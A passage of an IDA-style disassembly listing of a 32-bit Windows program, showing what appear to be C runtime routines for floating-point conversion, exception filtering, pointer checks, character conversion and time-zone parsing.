sub ecx, edx
shl eax, cl
push eax
push dword ptr [edi]
call sub_41F456
add esp, 0Ch
dec esi
js short loc_41E4A3
lea edi, [ebx+esi*4]
loc_41E48A: ; CODE XREF: sub_41E451+50�j
test eax, eax
jz short loc_41E4A3
push edi
push 1
push dword ptr [edi]
call sub_41F456
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_41E48A
loc_41E4A3: ; CODE XREF: sub_41E451+34�j
; sub_41E451+3B�j
pop edi
pop esi
pop ebx
retn
sub_41E451 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E4A7 proc near ; CODE XREF: sub_41E602+81�p
; sub_41E602+CC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
lea edi, [eax-1]
push 20h
pop ecx
and [ebp+var_4], 0
lea ebx, [edi+1]
push 20h
mov eax, ebx
pop esi
cdq
idiv ecx
push 1Fh
mov ecx, eax
mov eax, ebx
cdq
idiv esi
mov eax, [ebp+arg_0]
pop esi
push 1
mov [ebp+var_8], ecx
lea eax, [eax+ecx*4]
mov [ebp+arg_4], eax
sub esi, edx
pop edx
mov ecx, esi
shl edx, cl
test [eax], edx
jz short loc_41E50B
inc ebx
push ebx
push [ebp+arg_0]
call sub_41E408
pop ecx
test eax, eax
pop ecx
jnz short loc_41E508
push edi
push [ebp+arg_0]
call sub_41E451
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_41E508: ; CODE XREF: sub_41E4A7+51�j
mov eax, [ebp+arg_4]
loc_41E50B: ; CODE XREF: sub_41E4A7+41�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax], edx
mov eax, [ebp+var_8]
inc eax
cmp eax, ecx
jge short loc_41E52B
mov edx, [ebp+arg_0]
sub ecx, eax
lea edi, [edx+eax*4]
xor eax, eax
rep stosd
loc_41E52B: ; CODE XREF: sub_41E4A7+76�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41E4A7 endp
; =============== S U B R O U T I N E =======================================
sub_41E533 proc near ; CODE XREF: sub_41E602+75�p
; sub_41E602+B6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push esi
push 3
sub ecx, eax
pop edx
loc_41E541: ; CODE XREF: sub_41E533+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_41E541
pop esi
retn
sub_41E533 endp
; =============== S U B R O U T I N E =======================================
sub_41E54E proc near ; CODE XREF: sub_41E602+5F�p
; sub_41E602+9E�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor eax, eax
stosd
stosd
stosd
pop edi
retn
sub_41E54E endp
; =============== S U B R O U T I N E =======================================
sub_41E55A proc near ; CODE XREF: sub_41E602+4D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_41E560: ; CODE XREF: sub_41E55A+12�j
cmp dword ptr [eax], 0
jnz short loc_41E572
inc ecx
add eax, 4
cmp ecx, 3
jl short loc_41E560
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41E572: ; CODE XREF: sub_41E55A+9�j
xor eax, eax
retn
sub_41E55A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E575 proc near ; CODE XREF: sub_41E602+C0�p
; sub_41E602+DA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
mov edi, [ebp+arg_0]
pop ebx
or esi, 0FFFFFFFFh
cdq
mov ecx, ebx
mov [ebp+var_4], 3
idiv ecx
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
cdq
idiv ecx
and [ebp+arg_4], 0
mov ecx, edx
shl esi, cl
sub ebx, edx
not esi
loc_41E5AB: ; CODE XREF: sub_41E575+58�j
mov eax, [edi]
mov ecx, eax
and ecx, esi
mov [ebp+var_8], ecx
mov ecx, edx
shr eax, cl
or eax, [ebp+arg_4]
mov [edi], eax
mov eax, [ebp+var_8]
mov ecx, ebx
add edi, 4
shl eax, cl
dec [ebp+var_4]
mov [ebp+arg_4], eax
jnz short loc_41E5AB
mov edi, [ebp+var_C]
push 2
pop ebx
mov esi, edi
push 8
pop ecx
shl esi, 2
loc_41E5DD: ; CODE XREF: sub_41E575+86�j
cmp ebx, edi
jl short loc_41E5F0
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, esi
mov eax, [eax+edx]
mov [ecx+edx], eax
jmp short loc_41E5F7
; ---------------------------------------------------------------------------
loc_41E5F0: ; CODE XREF: sub_41E575+6A�j
mov eax, [ebp+arg_0]
and dword ptr [ecx+eax], 0
loc_41E5F7: ; CODE XREF: sub_41E575+79�j
dec ebx
sub ecx, 4
jns short loc_41E5DD
pop edi
pop esi
pop ebx
leave
retn
sub_41E575 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E602 proc near ; CODE XREF: sub_41E76E+D�p
; sub_41E784+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
movzx ecx, word ptr [eax+0Ah]
mov ebx, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
mov edi, [ebp+arg_8]
and ebx, 7FFFh
sub ebx, 3FFFh
mov [ebp+var_8], ecx
shl eax, 10h
cmp ebx, 0FFFFC001h
mov [ebp+var_4], eax
jnz short loc_41E66F
lea eax, [ebp+var_C]
xor esi, esi
push eax
call sub_41E55A
test eax, eax
pop ecx
jnz loc_41E72E
lea eax, [ebp+var_C]
push eax
call sub_41E54E
pop ecx
loc_41E667: ; CODE XREF: sub_41E602+E4�j
push 2
loc_41E669: ; CODE XREF: sub_41E602+110�j
pop eax
jmp loc_41E730
; ---------------------------------------------------------------------------
loc_41E66F: ; CODE XREF: sub_41E602+45�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
call sub_41E533
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_41E4A7
add esp, 10h
test eax, eax
jz short loc_41E690
inc ebx
loc_41E690: ; CODE XREF: sub_41E602+8B�j
mov eax, [edi+4]
mov ecx, eax
sub ecx, [edi+8]
cmp ebx, ecx
jge short loc_41E6A8
lea eax, [ebp+var_C]
push eax
call sub_41E54E
pop ecx
jmp short loc_41E6E4
; ---------------------------------------------------------------------------
loc_41E6A8: ; CODE XREF: sub_41E602+98�j
cmp ebx, eax
jg short loc_41E6EB
sub eax, ebx
mov esi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41E533
lea eax, [ebp+var_C]
push esi
push eax
call sub_41E575
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_41E4A7
mov eax, [edi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_41E575
add esp, 20h
loc_41E6E4: ; CODE XREF: sub_41E602+A4�j
xor esi, esi
jmp loc_41E667
; ---------------------------------------------------------------------------
loc_41E6EB: ; CODE XREF: sub_41E602+A8�j
cmp ebx, [edi]
jl short loc_41E717
lea eax, [ebp+var_C]
push eax
call sub_41E54E
push dword ptr [edi+0Ch]
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_41E575
mov esi, [edi+14h]
add esp, 0Ch
add esi, [edi]
push 1
jmp loc_41E669
; ---------------------------------------------------------------------------
loc_41E717: ; CODE XREF: sub_41E602+EB�j
push dword ptr [edi+0Ch]
mov esi, [edi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add esi, ebx
call sub_41E575
pop ecx
pop ecx
loc_41E72E: ; CODE XREF: sub_41E602+55�j
xor eax, eax
loc_41E730: ; CODE XREF: sub_41E602+68�j
push 1Fh
pop ecx
sub ecx, [edi+0Ch]
mov edi, [edi+10h]
shl esi, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or esi, ecx
or esi, [ebp+var_C]
cmp edi, 40h
jnz short loc_41E75F
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], esi
mov [ecx], edx
jmp short loc_41E769
; ---------------------------------------------------------------------------
loc_41E75F: ; CODE XREF: sub_41E602+14E�j
cmp edi, 20h
jnz short loc_41E769
mov ecx, [ebp+arg_4]
mov [ecx], esi
loc_41E769: ; CODE XREF: sub_41E602+15B�j
; sub_41E602+160�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E602 endp
; =============== S U B R O U T I N E =======================================
sub_41E76E proc near ; CODE XREF: sub_41E79A+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_431D00
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41E602
add esp, 0Ch
retn
sub_41E76E endp
; =============== S U B R O U T I N E =======================================
sub_41E784 proc near ; CODE XREF: sub_41E7C7+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_431D18
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41E602
add esp, 0Ch
retn
sub_41E784 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E79A proc near ; CODE XREF: sub_41AA4F+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41F5F7
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_41E76E
add esp, 24h
leave
retn
sub_41E79A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E7C7 proc near ; CODE XREF: sub_41AA4F+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41F5F7
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_41E784
add esp, 24h
leave
retn
sub_41E7C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E7F4 proc near ; CODE XREF: sub_41AA8D+65�p
; sub_41AB91+63�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov ecx, [edx+0Ch]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
test ebx, ebx
mov eax, edi
jle short loc_41E831
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_41E817: ; CODE XREF: sub_41E7F4+38�j
mov dl, [ecx]
test dl, dl
jz short loc_41E823
movsx edx, dl
inc ecx
jmp short loc_41E826
; ---------------------------------------------------------------------------
loc_41E823: ; CODE XREF: sub_41E7F4+27�j
push 30h
pop edx
loc_41E826: ; CODE XREF: sub_41E7F4+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_41E817
mov edx, [ebp+arg_8]
loc_41E831: ; CODE XREF: sub_41E7F4+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_41E84A
cmp byte ptr [ecx], 35h
jl short loc_41E84A
loc_41E83D: ; CODE XREF: sub_41E7F4+52�j
dec eax
cmp byte ptr [eax], 39h
jnz short loc_41E848
mov byte ptr [eax], 30h
jmp short loc_41E83D
; ---------------------------------------------------------------------------
loc_41E848: ; CODE XREF: sub_41E7F4+4D�j
inc byte ptr [eax]
loc_41E84A: ; CODE XREF: sub_41E7F4+42�j
; sub_41E7F4+47�j
cmp byte ptr [esi], 31h
jnz short loc_41E854
inc dword ptr [edx+4]
jmp short loc_41E866
; ---------------------------------------------------------------------------
loc_41E854: ; CODE XREF: sub_41E7F4+59�j
push edi
call sub_415C80
inc eax
push eax
push edi
push esi
call sub_416470
add esp, 10h
loc_41E866: ; CODE XREF: sub_41E7F4+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41E7F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E86B proc near ; CODE XREF: sub_41AA8D+3F�p
; sub_41AB91+46�p ...
var_C = byte ptr -0Ch
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
lea eax, [ebp+arg_0]
push edi
push eax
lea eax, [ebp+var_C]
push eax
call sub_41E8CF
pop ecx
lea esi, [ebp+var_C]
pop ecx
push offset word_4C9258
push 0
push 11h
sub esp, 0Ch
mov edi, esp
movsd
movsd
movsw
call sub_41FAC8
mov ds:dword_4C9280, eax
add esp, 18h
movsx eax, ds:byte_4C925A
mov ds:dword_4C9278, eax
pop edi
movsx eax, ds:word_4C9258
mov ds:dword_4C927C, eax
mov ds:dword_4C9284, offset dword_4C925C
mov eax, offset dword_4C9278
pop esi
leave
retn
sub_41E86B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E8CF proc near ; CODE XREF: sub_41E86B+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
push edi
mov ax, [edx+6]
mov edi, 7FFh
mov ecx, eax
and eax, 8000h
shr ecx, 4
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_41E91D
cmp ebx, edi
jz short loc_41E916
lea edi, [ecx+3C00h]
jmp short loc_41E93E
; ---------------------------------------------------------------------------
loc_41E916: ; CODE XREF: sub_41E8CF+3D�j
mov edi, 7FFFh
jmp short loc_41E93E
; ---------------------------------------------------------------------------
loc_41E91D: ; CODE XREF: sub_41E8CF+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_41E935
cmp edx, ebx
jnz short loc_41E935
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_41E980
; ---------------------------------------------------------------------------
loc_41E935: ; CODE XREF: sub_41E8CF+52�j
; sub_41E8CF+56�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_41E93E: ; CODE XREF: sub_41E8CF+45�j
; sub_41E8CF+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
mov eax, [ebp+arg_0]
or ecx, [ebp+var_4]
shl edx, 0Bh
mov [eax+4], ecx
mov [eax], edx
loc_41E956: ; CODE XREF: sub_41E8CF+A6�j
test ecx, esi
jnz short loc_41E977
mov edx, [eax]
add ecx, ecx
mov ebx, edx
shr ebx, 1Fh
or ebx, ecx
lea ecx, [edx+edx]
mov [eax], ecx
mov [eax+4], ebx
add edi, 0FFFFh
mov ecx, ebx
jmp short loc_41E956
; ---------------------------------------------------------------------------
loc_41E977: ; CODE XREF: sub_41E8CF+89�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_41E980: ; CODE XREF: sub_41E8CF+64�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E8CF endp
; ---------------------------------------------------------------------------
push 2
call sub_417DFA
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_41E98E proc near ; DATA XREF: _0:0041E9D4�o _2:004316D8�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41E9B1
cmp dword ptr [eax+10h], 3
jnz short loc_41E9B1
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41E9B1
jmp sub_41B61C
; ---------------------------------------------------------------------------
loc_41E9B1: ; CODE XREF: sub_41E98E+D�j
; sub_41E98E+13�j ...
mov eax, ds:dword_4C9288
test eax, eax
jz short loc_41E9CE
push eax
call sub_41EA2A
test eax, eax
pop ecx
jz short loc_41E9CE
push esi
call ds:dword_4C9288
jmp short loc_41E9D0
; ---------------------------------------------------------------------------
loc_41E9CE: ; CODE XREF: sub_41E98E+2A�j
; sub_41E98E+35�j
xor eax, eax
loc_41E9D0: ; CODE XREF: sub_41E98E+3E�j
pop esi
retn 4
sub_41E98E endp
; ---------------------------------------------------------------------------
push offset sub_41E98E
call ds:off_42201C
mov ds:dword_4C9288, eax
retn
; ---------------------------------------------------------------------------
loc_41E9E5: ; DATA XREF: _2:00424034�o
push ds:dword_4C9288
call ds:off_42201C
retn
; =============== S U B R O U T I N E =======================================
sub_41E9F2 proc near ; CODE XREF: sub_41AE65+6B�p
; sub_41B376+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call ds:dword_422018 ; IsBadReadPtr
test eax, eax
jz short loc_41EA0A
xor esi, esi
loc_41EA0A: ; CODE XREF: sub_41E9F2+14�j
mov eax, esi
pop esi
retn
sub_41E9F2 endp
; =============== S U B R O U T I N E =======================================
sub_41EA0E proc near ; CODE XREF: sub_41B376+73�p
; sub_41B376+BF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call ds:dword_4221A0 ; IsBadWritePtr
test eax, eax
jz short loc_41EA26
xor esi, esi
loc_41EA26: ; CODE XREF: sub_41EA0E+14�j
mov eax, esi
pop esi
retn
sub_41EA0E endp
; =============== S U B R O U T I N E =======================================
sub_41EA2A proc near ; CODE XREF: sub_41B376+15B�p
; sub_41E98E+2D�p
arg_0 = dword ptr 4
push esi
push 1
pop esi
push [esp+4+arg_0]
call ds:dword_422014 ; IsBadCodePtr
test eax, eax
jz short loc_41EA3E
xor esi, esi
loc_41EA3E: ; CODE XREF: sub_41EA2A+10�j
mov eax, esi
pop esi
retn
sub_41EA2A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41B61C
loc_41EA42: ; CODE XREF: sub_41B61C:loc_41B66D�j
push 0Ah
call sub_41D9A5
push 16h
call sub_41FD5B
pop ecx
pop ecx
push 3
call sub_417C16
; END OF FUNCTION CHUNK FOR sub_41B61C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EA59 proc near ; CODE XREF: sub_41B7F5+6A3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_41EA7C
cmp [ebp+arg_8], ebx
jz short loc_41EA7C
mov al, [esi]
cmp al, bl
jnz short loc_41EA82
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_41EA7C
mov [eax], bx
loc_41EA7C: ; CODE XREF: sub_41EA59+C�j
; sub_41EA59+11�j ...
xor eax, eax
loc_41EA7E: ; CODE XREF: sub_41EA59+42�j
; sub_41EA59+86�j ...
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41EA82: ; CODE XREF: sub_41EA59+17�j
cmp ds:dword_4C911C, ebx
jnz short loc_41EA9D
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_41EA98
movzx ax, al
mov [ecx], ax
loc_41EA98: ; CODE XREF: sub_41EA59+36�j
; sub_41EA59+C0�j
push 1
pop eax
jmp short loc_41EA7E
; ---------------------------------------------------------------------------
loc_41EA9D: ; CODE XREF: sub_41EA59+2F�j
mov ecx, ds:off_42F360
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41EAFA
mov eax, ds:dword_42F56C
cmp eax, 1
jle short loc_41EAE1
cmp [ebp+arg_8], eax
jl short loc_41EAEB
xor ecx, ecx
cmp [ebp+arg_0], ebx
setnz cl
push ecx
push [ebp+arg_0]
push eax
push esi
push 9
push ds:dword_4C912C
call ds:dword_422134 ; MultiByteToWideChar
test eax, eax
mov eax, ds:dword_42F56C
jnz short loc_41EA7E
loc_41EAE1: ; CODE XREF: sub_41EA59+5C�j
cmp [ebp+arg_8], eax
jb short loc_41EAEB
cmp [esi+1], bl
jnz short loc_41EA7E
loc_41EAEB: ; CODE XREF: sub_41EA59+61�j
; sub_41EA59+8B�j ...
mov ds:dword_4C9084, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_41EA7E
; ---------------------------------------------------------------------------
loc_41EAFA: ; CODE XREF: sub_41EA59+52�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
push 1
push esi
push 9
push ds:dword_4C912C
call ds:dword_422134 ; MultiByteToWideChar
test eax, eax
jnz loc_41EA98
jmp short loc_41EAEB
sub_41EA59 endp
; =============== S U B R O U T I N E =======================================
sub_41EB21 proc near ; CODE XREF: sub_41B7F5+76�p
; sub_41B7F5+88�p ...
arg_0 = dword ptr 4
cmp ds:dword_42F56C, 1
jle short loc_41EB38
push 8
push [esp+4+arg_0]
call sub_418762
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41EB38: ; CODE XREF: sub_41EB21+7�j
mov eax, [esp+arg_0]
mov ecx, ds:off_42F360
mov al, [ecx+eax*2]
and eax, 8
retn
sub_41EB21 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41EB50 proc near ; CODE XREF: sub_41B7F5+797�p
; sub_41B7F5+7E7�p
cmp cl, 40h
jnb short loc_41EB6A
cmp cl, 20h
jnb short loc_41EB60
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_41EB60: ; CODE XREF: sub_41EB50+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_41EB6A: ; CODE XREF: sub_41EB50+3�j
xor eax, eax
xor edx, edx
retn
sub_41EB50 endp
; =============== S U B R O U T I N E =======================================
sub_41EB6F proc near ; CODE XREF: sub_41C26B+F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_41EBBB
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_41EB8D
test al, 80h
jz short loc_41EBBB
test al, 2
jnz short loc_41EBBB
loc_41EB8D: ; CODE XREF: sub_41EB6F+14�j
cmp dword ptr [esi+8], 0
jnz short loc_41EB9A
push esi
call sub_41DAF8
pop ecx
loc_41EB9A: ; CODE XREF: sub_41EB6F+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_41EBAA
cmp dword ptr [esi+4], 0
jnz short loc_41EBBB
inc eax
mov [esi], eax
loc_41EBAA: ; CODE XREF: sub_41EB6F+30�j
test byte ptr [esi+0Ch], 40h
jz short loc_41EBC1
dec dword ptr [esi]
mov eax, [esi]
cmp [eax], bl
jz short loc_41EBC7
inc eax
mov [esi], eax
loc_41EBBB: ; CODE XREF: sub_41EB6F+9�j
; sub_41EB6F+18�j ...
or eax, 0FFFFFFFFh
loc_41EBBE: ; CODE XREF: sub_41EB6F+6C�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41EBC1: ; CODE XREF: sub_41EB6F+3F�j
dec dword ptr [esi]
mov eax, [esi]
mov [eax], bl
loc_41EBC7: ; CODE XREF: sub_41EB6F+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and al, 0EFh
or al, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_41EBBE
sub_41EB6F endp
; =============== S U B R O U T I N E =======================================
sub_41EBDD proc near ; CODE XREF: sub_41C2A6:loc_41C2E5�p
cmp ds:dword_4C9348, 0
jnz short locret_41EBF1
call sub_41EBF2
inc ds:dword_4C9348
locret_41EBF1: ; CODE XREF: sub_41EBDD+7�j
retn
sub_41EBDD endp
; =============== S U B R O U T I N E =======================================
sub_41EBF2 proc near ; CODE XREF: sub_41EBDD+9�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
xor ebp, ebp
or ebx, 0FFFFFFFFh
push offset aTz ; "TZ"
xor edi, edi
mov ds:dword_4C9290, ebp
mov ds:dword_431DD8, ebx
mov ds:dword_431DC8, ebx
call sub_41FECD
mov esi, eax
pop ecx
cmp esi, ebp
jnz loc_41ED1B
push offset dword_4C9298
call ds:dword_422174 ; GetTimeZoneInformation
cmp eax, ebx
jz loc_41EE4A
mov eax, ds:dword_4C9298
mov ecx, ds:dword_4C92EC
imul eax, 3Ch
cmp ds:word_4C92DE, bp
push 1
pop edx
mov ds:dword_431D30, eax
mov ds:dword_4C9290, edx
jz short loc_41EC69
mov esi, ecx
imul esi, 3Ch
add eax, esi
mov ds:dword_431D30, eax
loc_41EC69: ; CODE XREF: sub_41EBF2+69�j
cmp ds:word_4C9332, bp
jz short loc_41EC8D
mov eax, ds:dword_4C9340
cmp eax, ebp
jz short loc_41EC8D
sub eax, ecx
mov ds:dword_431D34, edx
imul eax, 3Ch
mov ds:dword_431D38, eax
jmp short loc_41EC99
; ---------------------------------------------------------------------------
loc_41EC8D: ; CODE XREF: sub_41EBF2+7E�j
; sub_41EBF2+87�j
mov ds:dword_431D34, ebp
mov ds:dword_431D38, ebp
loc_41EC99: ; CODE XREF: sub_41EBF2+99�j
lea eax, [esp+14h+var_4]
mov esi, ds:dword_422130
push eax
push ebp
push 3Fh
mov edi, 220h
push ds:off_431DBC
push ebx
push offset dword_4C929C
push edi
push ds:dword_4C912C
call esi ; WideCharToMultiByte
test eax, eax
jz short loc_41ECD6
cmp [esp+14h+var_4], ebp
jnz short loc_41ECD6
mov eax, ds:off_431DBC
and byte ptr [eax+3Fh], 0
jmp short loc_41ECDE
; ---------------------------------------------------------------------------
loc_41ECD6: ; CODE XREF: sub_41EBF2+D1�j
; sub_41EBF2+D7�j
mov eax, ds:off_431DBC
and byte ptr [eax], 0
loc_41ECDE: ; CODE XREF: sub_41EBF2+E2�j
lea eax, [esp+14h+var_4]
push eax
push ebp
push 3Fh
push ds:off_431DC0
push ebx
push offset dword_4C92F0
push edi
push ds:dword_4C912C
call esi ; WideCharToMultiByte
test eax, eax
jz loc_41EE42
cmp [esp+14h+var_4], ebp
jnz loc_41EE42
mov eax, ds:off_431DC0
and byte ptr [eax+3Fh], 0
jmp loc_41EE4A
; ---------------------------------------------------------------------------
loc_41ED1B: ; CODE XREF: sub_41EBF2+2D�j
cmp byte ptr [esi], 0
jz loc_41EE4A
mov eax, ds:dword_4C9344
cmp eax, ebp
jz short loc_41ED3E
push eax
push esi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41EE4A
loc_41ED3E: ; CODE XREF: sub_41EBF2+139�j
push ds:dword_4C9344
call sub_415DE1
push esi
call sub_415C80
inc eax
push eax
call sub_415D2F
add esp, 0Ch
cmp eax, ebp
mov ds:dword_4C9344, eax
jz loc_41EE4A
push esi
push eax
call sub_415B90
push 3
push esi
push ds:off_431DBC
call sub_416D30
mov eax, ds:off_431DBC
add esi, 3
add esp, 14h
and byte ptr [eax+3], 0
cmp byte ptr [esi], 2Dh
jnz short loc_41ED93
push 1
inc esi
pop edi
loc_41ED93: ; CODE XREF: sub_41EBF2+19B�j
push esi
call sub_415964
pop ecx
mov bl, 30h
mov ecx, eax
imul ecx, 0E10h
mov ds:dword_431D30, ecx
loc_41EDAA: ; CODE XREF: sub_41EBF2+1C7�j
mov al, [esi]
cmp al, 2Bh
jz short loc_41EDB8
cmp al, bl
jl short loc_41EDBB
cmp al, 39h
jg short loc_41EDBB
loc_41EDB8: ; CODE XREF: sub_41EBF2+1BC�j
inc esi
jmp short loc_41EDAA
; ---------------------------------------------------------------------------
loc_41EDBB: ; CODE XREF: sub_41EBF2+1C0�j
; sub_41EBF2+1C4�j
cmp byte ptr [esi], 3Ah
jnz short loc_41EE0E
inc esi
push esi
call sub_415964
imul eax, 3Ch
pop ecx
mov ecx, ds:dword_431D30
add ecx, eax
mov ds:dword_431D30, ecx
loc_41EDD9: ; CODE XREF: sub_41EBF2+1F2�j
mov al, [esi]
cmp al, bl
jl short loc_41EDE6
cmp al, 39h
jg short loc_41EDE6
inc esi
jmp short loc_41EDD9
; ---------------------------------------------------------------------------
loc_41EDE6: ; CODE XREF: sub_41EBF2+1EB�j
; sub_41EBF2+1EF�j
cmp byte ptr [esi], 3Ah
jnz short loc_41EE0E
inc esi
push esi
call sub_415964
pop ecx
mov ecx, ds:dword_431D30
add ecx, eax
mov ds:dword_431D30, ecx
loc_41EE01: ; CODE XREF: sub_41EBF2+21A�j
mov al, [esi]
cmp al, bl
jl short loc_41EE0E
cmp al, 39h
jg short loc_41EE0E
inc esi
jmp short loc_41EE01
; ---------------------------------------------------------------------------
loc_41EE0E: ; CODE XREF: sub_41EBF2+1CC�j
; sub_41EBF2+1F7�j ...
cmp edi, ebp
jz short loc_41EE1A
neg ecx
mov ds:dword_431D30, ecx
